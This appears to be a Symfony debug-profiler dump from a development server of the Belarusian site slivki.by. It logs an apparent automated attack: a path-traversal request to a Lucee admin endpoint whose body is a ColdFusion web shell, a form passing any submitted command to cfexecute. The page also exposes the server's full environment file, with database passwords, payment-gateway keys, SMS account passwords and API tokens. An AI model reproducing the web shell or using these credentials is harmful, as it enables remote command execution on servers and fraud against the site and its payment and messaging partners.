n/a
Request
GET Parameters
Key | Value |
---|---|
file | "/../../../context/2wl86abhAEkMpK5zVfOIf3yzZFa.cfm" |
POST Parameters
Key | Value |
---|---|
imgSrc | """ \r\n <cfoutput>\r\n \r\n <table>\r\n <form method="POST" action="">\r\n <tr><td>Command:</td><td><input type=test name="cmd" size=50\r\n <cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>\r\n <tr><td>Options:</td><td> <input type=text name="opts" size=50\r\n <cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>\r\n <tr><td>Timeout:</td><td> <input type=text name="timeout" size=4\r\n <cfif isdefined("form.timeout")>value="#form.timeout#"\r\n <cfelse> value="5"</cfif>></td></tr>\r\n </table>\r\n <input type=submit value="Exec" >\r\n </form>\r\n <cfif isdefined("form.cmd")>\r\n <cfsavecontent variable="myVar">\r\n <cfexecute name = "#Form.cmd#"\r\n arguments = "#Form.opts#"\r\n timeout = "#Form.timeout#">\r\n </cfexecute>\r\n </cfsavecontent>\r\n <pre> """ |
Uploaded Files
No files were uploaded
Request Attributes
Key | Value |
---|---|
_remove_csp_headers | true |
_stopwatch_token | "38e60d" |
Request Headers
Header | Value |
---|---|
accept-encoding | "gzip" |
connection | "close" |
content-length | "735" |
content-type | "application/x-www-form-urlencoded" |
cookie | "PHPSESSID=8ftcan9es0ut2djb12noijuj3r" |
host | "pinsk.vlad.dev.slivki.by" |
user-agent | "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" |
x-php-ob-level | "1" |
Request Content
Raw
imgSrc= <cfoutput> <table> <form method="POST" action=""> <tr><td>Command:</td><td><input type=test name="cmd" size=50 <cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr> <tr><td>Options:</td><td> <input type=text name="opts" size=50 <cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr> <tr><td>Timeout:</td><td> <input type=text name="timeout" size=4 <cfif isdefined("form.timeout")>value="#form.timeout#" <cfelse> value="5"</cfif>></td></tr> </table> <input type=submit value="Exec" > </form> <cfif isdefined("form.cmd")> <cfsavecontent variable="myVar"> <cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#"> </cfexecute> </cfsavecontent> <pre>
Response
Response Headers
Header | Value |
---|---|
cache-control | "no-cache, private" |
content-type | "text/html; charset=UTF-8" |
date | "Tue, 13 May 2025 17:35:39 GMT" |
x-debug-exception | "No%20route%20found%20for%20%22POST%20https%3A%2F%2Fpinsk.vlad.dev.slivki.by%2Flucee%2Fadmin%2FimgProcess.cfm%22" |
x-debug-exception-file | "%2Fmnt%2Fdata%2Fvirtwww%2Fvlad-slivki%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135" |
x-debug-token | "d1f950" |
x-debug-token-link | "https://pinsk.vlad.dev.slivki.by/_profiler/9a3e05" |
x-previous-debug-token | "9a3e05" |
x-robots-tag | "noindex" |
Cookies
Request Cookies
Key | Value |
---|---|
PHPSESSID | "8ftcan9es0ut2djb12noijuj3r" |
Response Cookies
No response cookies
Session 3
Session Metadata
Key | Value |
---|---|
Created | "Tue, 13 May 25 20:34:38 +0300" |
Last used | "Tue, 13 May 25 20:34:38 +0300" |
Lifetime | 0 |
Session Attributes
Attribute | Value |
---|---|
cityDomain | "pinsk" |
cityID-1- | 50 |
Session Usage
3
Usages
Stateless check enabled
Usage |
---|
Slivki\EventSubscriber\KernelControllerSubscriber:155
[ [ "file" => "/mnt/data/virtwww/vlad-slivki/src/EventSubscriber/KernelControllerSubscriber.php" "line" => 155 "function" => "set" "class" => "Symfony\Component\HttpFoundation\Session\Session" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/event-dispatcher/Debug/WrappedListener.php" "line" => 117 "function" => "onKernelRequest" "class" => "Slivki\EventSubscriber\KernelControllerSubscriber" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/event-dispatcher/EventDispatcher.php" "line" => 230 "function" => "__invoke" "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/event-dispatcher/EventDispatcher.php" "line" => 59 "function" => "callListeners" "class" => "Symfony\Component\EventDispatcher\EventDispatcher" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php" "line" => 154 "function" => "dispatch" "class" => "Symfony\Component\EventDispatcher\EventDispatcher" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/http-kernel/HttpKernel.php" "line" => 139 "function" => "dispatch" "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/http-kernel/HttpKernel.php" "line" => 75 "function" => "handleRaw" "class" => "Symfony\Component\HttpKernel\HttpKernel" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/http-kernel/Kernel.php" "line" => 202 "function" => "handle" "class" => "Symfony\Component\HttpKernel\HttpKernel" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/public/index.php" "line" => 30 "function" => "handle" "class" => "Symfony\Component\HttpKernel\Kernel" "type" => "->" ] ] |
Slivki\EventSubscriber\KernelControllerSubscriber:166
[ [ "file" => "/mnt/data/virtwww/vlad-slivki/src/EventSubscriber/KernelControllerSubscriber.php" "line" => 166 "function" => "set" "class" => "Symfony\Component\HttpFoundation\Session\Session" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/event-dispatcher/Debug/WrappedListener.php" "line" => 117 "function" => "onKernelRequest" "class" => "Slivki\EventSubscriber\KernelControllerSubscriber" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/event-dispatcher/EventDispatcher.php" "line" => 230 "function" => "__invoke" "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/event-dispatcher/EventDispatcher.php" "line" => 59 "function" => "callListeners" "class" => "Symfony\Component\EventDispatcher\EventDispatcher" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php" "line" => 154 "function" => "dispatch" "class" => "Symfony\Component\EventDispatcher\EventDispatcher" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/http-kernel/HttpKernel.php" "line" => 139 "function" => "dispatch" "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/http-kernel/HttpKernel.php" "line" => 75 "function" => "handleRaw" "class" => "Symfony\Component\HttpKernel\HttpKernel" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/http-kernel/Kernel.php" "line" => 202 "function" => "handle" "class" => "Symfony\Component\HttpKernel\HttpKernel" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/public/index.php" "line" => 30 "function" => "handle" "class" => "Symfony\Component\HttpKernel\Kernel" "type" => "->" ] ] |
Slivki\EventSubscriber\KernelControllerSubscriber:167
[ [ "file" => "/mnt/data/virtwww/vlad-slivki/src/EventSubscriber/KernelControllerSubscriber.php" "line" => 167 "function" => "set" "class" => "Symfony\Component\HttpFoundation\Session\Session" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/event-dispatcher/Debug/WrappedListener.php" "line" => 117 "function" => "onKernelRequest" "class" => "Slivki\EventSubscriber\KernelControllerSubscriber" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/event-dispatcher/EventDispatcher.php" "line" => 230 "function" => "__invoke" "class" => "Symfony\Component\EventDispatcher\Debug\WrappedListener" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/event-dispatcher/EventDispatcher.php" "line" => 59 "function" => "callListeners" "class" => "Symfony\Component\EventDispatcher\EventDispatcher" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php" "line" => 154 "function" => "dispatch" "class" => "Symfony\Component\EventDispatcher\EventDispatcher" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/http-kernel/HttpKernel.php" "line" => 139 "function" => "dispatch" "class" => "Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/http-kernel/HttpKernel.php" "line" => 75 "function" => "handleRaw" "class" => "Symfony\Component\HttpKernel\HttpKernel" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/vendor/symfony/http-kernel/Kernel.php" "line" => 202 "function" => "handle" "class" => "Symfony\Component\HttpKernel\HttpKernel" "type" => "->" ] [ "file" => "/mnt/data/virtwww/vlad-slivki/public/index.php" "line" => 30 "function" => "handle" "class" => "Symfony\Component\HttpKernel\Kernel" "type" => "->" ] ] |
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
Key | Value |
---|---|
APP_SECRET | "fe8122f31e8880ab6477e3f45ee3928a" |
BASE_DOMAIN | ".vlad.dev.slivki.by" |
BASE_URL | "https://www.vlad.dev.slivki.by" |
BEPAID_API_URL | "https://gateway.bepaid.by/v2" |
BEPAID_PROD_MODE | "false" |
CLICK_MERCHANT_ID | "21243" |
CLICK_MERCHANT_USER_ID | "34060" |
CLICK_SECRET_KEY | "gxDJXCqHFEv" |
CLICK_SERVICE_ID | "28907" |
DATABASE_ADMIN_URL | "pgsql://slivki_admin:3604bb30ccce5754b226a538179492e7@127.0.0.1:5432/adv" |
DATABASE_URL | "pgsql://slivki_site:3604bb30ccce5754b226a538179492e7@127.0.0.1:5432/adv" |
DEEPL_AUTH_KEY | "aa8770fd-5b5e-60a1-28d6-adc78c79cf1e:fx" |
DEFAULT_CITY_ID | "1" |
DOMINOS_API_ACCESS_TOKEN | "slivki_test_token" |
DOMINOS_API_URL | "https://partners.staging-by.galament.net/api/partners" |
FIXER_ACCESS_TOKEN | "c702e71634b1f3d198db1ae8f85174c3" |
FIXER_API_URL | "http://data.fixer.io/api/latest" |
GOOGLE_AUTH_KEY | "AIzaSyBnPZftGKIEZwLnwdyviccyYHR0ZIryFYw" |
IIKO_CLOUD_API_URL | "https://api-ru.iiko.services" |
IIKO_CLOUD_CHEFARTS_API_LOGIN | "9609602d-5a6" |
IIKO_CLOUD_CHEFARTS_ORGANIZATION_ID | "01330000-6bec-ac1f-05c4-08da4479b4ab" |
MAILER_INFO_EMAIL | "info@slivki.by" |
MAILER_INFO_NAME | "Slivki.by" |
MAILER_SECONDARY_INFO_EMAIL | "infoslivki@gmail.com" |
MAILER_URL | "null://localhost" |
MAPBOX_ACCESS_TOKEN | "sk.eyJ1IjoiYXRzbGl2a2lieSIsImEiOiJja3Y5YXBlMDMwM2NwMzFwZ3BiNTE2YXFiIn0.MTzizJOCoJxTWfG3Xcgzjw" |
MAPBOX_API_URL | "https://api.mapbox.com" |
MAPBOX_STYLE_ID | "ckv9anbyu39nt14nwjcvdgnjx" |
MAPBOX_USERNAME | "atslivkiby" |
OPLATI_BASE_URL | "https://bpay-testcashdesk.lwo.by/ms-pay" |
OPLATI_PASSWORD | "SlivkiBY12345" |
OPLATI_REG_NUM | "OPL000000782" |
PAYME_KEY | "Qz8vECZiH73@iqh5?Ub@G34X3zAnPg0aDd#d" |
PAYME_MERCHANT_ID | "64a413fe5dad647a1817c315" |
PAYME_PROD_MOE | "true" |
REDIS_HOST | "redis" |
REDIS_PORT | "6379" |
REGIONAL_TEMPLATE_PATH | "" |
REGION_CODES | "BY,RU,DE,LV,LT,PL,UA,GE" |
ROCKET_SMS_PASSWORD | "497kWGBB" |
ROCKET_SMS_URI | "https://api.rocketsms.by/" |
ROCKET_SMS_USERNAME | "100993744" |
SLIVKI_METRICA_LOCAL_URL | "http://metrica.local" |
SLIVKI_METRICA_URL | "https://metrica.slivki.by" |
SUBSCRIPTION_BASE_URI | "http://subscription-service-1.local" |
SUBSCRIPTION_DATABASE_URL | "postgresql://subscription_site:c3344046badcf15f05ba9775b3e42d79@127.0.0.1:5432/ss?server_version=12.3&charset=utf8" |
SUBSCRIPTION_PASSWORD | "slivki" |
SUBSCRIPTION_USERNAME | "slivki" |
SUPERCHECK_URL | "https://supercheck.by" |
TIRE_ORDER_SEND_TO_EMAILS | "kopchaluyk@gmail.com" |
USER_SERVICE_BASE_URI | "http://login.dev.slivki.by" |
USER_SERVICE_DATABASE_URL | "postgres://logindevslivkiby:casdufTGwewqrdscs834@localhost:5432/logindevslivkiby" |
XABAR_UZ_ORIGINATOR | "3700" |
XABAR_UZ_SMS_PASSWORD | "1QftVsJK_$v$" |
XABAR_UZ_SMS_URI | "https://send.smsxabar.uz/" |
XABAR_UZ_SMS_USERNAME | "slivkitrade" |
YANDEX_RESERVE_API_KEY | "3b347e5f-b94d-4755-a499-f2acd5d2e6ea,618302ee-5132-4425-a292-bce7a2e4e4bb,6fc97240-9df0-4467-ab68-ce7b56224713" |
Defined as regular env variables
Key | Value |
---|---|
APP_DEBUG | "1" |
APP_ENV | "dev" |
CONTENT_LENGTH | "735" |
CONTENT_TYPE | "application/x-www-form-urlencoded" |
DOCUMENT_ROOT | "/mnt/data/virtwww/vlad-slivki/public" |
DOCUMENT_URI | "/index.php" |
FCGI_ROLE | "RESPONDER" |
GATEWAY_INTERFACE | "CGI/1.1" |
HOME | "/var/www" |
HTTPS | "on" |
HTTP_ACCEPT_ENCODING | "gzip" |
HTTP_CONNECTION | "close" |
HTTP_CONTENT_LENGTH | "735" |
HTTP_CONTENT_TYPE | "application/x-www-form-urlencoded" |
HTTP_COOKIE | "PHPSESSID=8ftcan9es0ut2djb12noijuj3r" |
HTTP_HOST | "pinsk.vlad.dev.slivki.by" |
HTTP_USER_AGENT | "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0" |
PHP_SELF | "/index.php" |
QUERY_STRING | "file=/../../../context/2wl86abhAEkMpK5zVfOIf3yzZFa.cfm" |
REDIRECT_STATUS | "200" |
REMOTE_ADDR | "162.253.155.145" |
REMOTE_PORT | "6740" |
REMOTE_USER | "" |
REQUEST_METHOD | "POST" |
REQUEST_SCHEME | "https" |
REQUEST_TIME | 1747157739 |
REQUEST_TIME_FLOAT | 1747157739.5722 |
REQUEST_URI | "/lucee/admin/imgProcess.cfm?file=/../../../context/2wl86abhAEkMpK5zVfOIf3yzZFa.cfm" |
SCRIPT_FILENAME | "/mnt/data/virtwww/vlad-slivki/public/index.php" |
SCRIPT_NAME | "/index.php" |
SERVER_ADDR | "10.1.1.203" |
SERVER_NAME | "vlad.dev.slivki.by" |
SERVER_PORT | "443" |
SERVER_PROTOCOL | "HTTP/1.1" |
SERVER_SOFTWARE | "nginx/1.18.0" |
SYMFONY_DOTENV_VARS | "APP_SECRET,MAILER_URL,MAILER_INFO_EMAIL,MAILER_INFO_NAME,MAILER_SECONDARY_INFO_EMAIL,DATABASE_URL,DATABASE_ADMIN_URL,BASE_DOMAIN,BASE_URL,DEFAULT_CITY_ID,REGIONAL_TEMPLATE_PATH,SUBSCRIPTION_USERNAME,SUBSCRIPTION_PASSWORD,SUBSCRIPTION_BASE_URI,SUBSCRIPTION_DATABASE_URL,SLIVKI_METRICA_URL,SLIVKI_METRICA_LOCAL_URL,SUPERCHECK_URL,MAPBOX_API_URL,MAPBOX_USERNAME,MAPBOX_STYLE_ID,MAPBOX_ACCESS_TOKEN,TIRE_ORDER_SEND_TO_EMAILS,REGION_CODES,BEPAID_API_URL,BEPAID_PROD_MODE,IIKO_CLOUD_API_URL,IIKO_CLOUD_CHEFARTS_API_LOGIN,IIKO_CLOUD_CHEFARTS_ORGANIZATION_ID,ROCKET_SMS_URI,ROCKET_SMS_USERNAME,ROCKET_SMS_PASSWORD,REDIS_HOST,REDIS_PORT,YANDEX_RESERVE_API_KEY,PAYME_MERCHANT_ID,PAYME_PROD_MOE,PAYME_KEY,CLICK_SERVICE_ID,CLICK_MERCHANT_ID,CLICK_SECRET_KEY,CLICK_MERCHANT_USER_ID,XABAR_UZ_SMS_URI,XABAR_UZ_SMS_USERNAME,XABAR_UZ_SMS_PASSWORD,XABAR_UZ_ORIGINATOR,FIXER_API_URL,FIXER_ACCESS_TOKEN,DEEPL_AUTH_KEY,GOOGLE_AUTH_KEY,OPLATI_REG_NUM,OPLATI_PASSWORD,OPLATI_BASE_URL,USER_SERVICE_DATABASE_URL,USER_SERVICE_BASE_URI,DOMINOS_API_URL,DOMINOS_API_ACCESS_TOKEN" |
USER | "www-data" |